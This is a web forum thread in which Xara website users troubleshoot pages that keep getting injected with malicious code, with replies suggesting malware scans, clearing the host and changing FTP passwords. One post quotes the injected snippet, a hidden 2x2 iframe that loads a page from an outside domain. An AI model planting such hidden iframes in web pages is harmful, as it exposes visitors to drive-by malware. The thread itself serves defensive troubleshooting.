No, I am using Xara to upload directly to the Web Server. The problem has not re-appeared since I manually deleted the files on the server etc. so at this point, fingers crossed, I think I may have put a stop to this!
Printable View
No, I am using Xara to upload directly to the Web Server. The problem has not re-appeared since I manually deleted the files on the server etc. so at this point, fingers crossed, I think I may have put a stop to this!
I've had the same thing happen to my sites and posted back in February about the same issue. I've contacted my webhost, WebHero, and they attribute the exploit code to my software (Xara). It reports in Avast that is roe.js and sends it to my security chest.
I'm not using filezilla and I've changed my password, so my account has not been hacked.
Here is the code that is reported as malicious code:
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thetallytype.com/ecaf.html?i=1513991>
I'm not sure if I pasted enough info for any help, but I've redone several websites and they eventually end up with malicious code, just different website in the code.
Extremely unlikely, unless your PC is infecting roe.js before publishing.
roe.js is safe javascript to help IE6 deal with PNG transparency.
Your site URL above throws up much more dangerous warnings about infecting 46 domains.
Personally, I would clear my hosting space and ask my host to check for hidden files that you may not see even using Filezilla to check all files on the server.
I would at least scan my PC using Malwarebytes in safemode then reboot to normal mode and republish my site.
Sorry, mixed my JSs up ;))
roe.js is the Roll Over Effects javascript.
png.js is the script for transparencies..
In any case, if roe.js was a malicious script, there would have been bazillions of reports by now.
I've scanned my computer several times with malware bytes, ms security essentials, trend micro house call, avast av, avg av, and others with nothing found. After I upload a page, it will be fine and then a couple days later it is infected. I had several websites that I haven't touched in years and they were infected. Webhero explained that a web bot was used to attack java script and that's how it becomes affected. They keep telling me to update my web page software. I have the latest update to ver9 and not sure what else to do if I continue using xara.
They're buck passing...
I'd recommend changing your FTP password though.
If it was Xara causing the problem I suspect other people would have reported it ;-)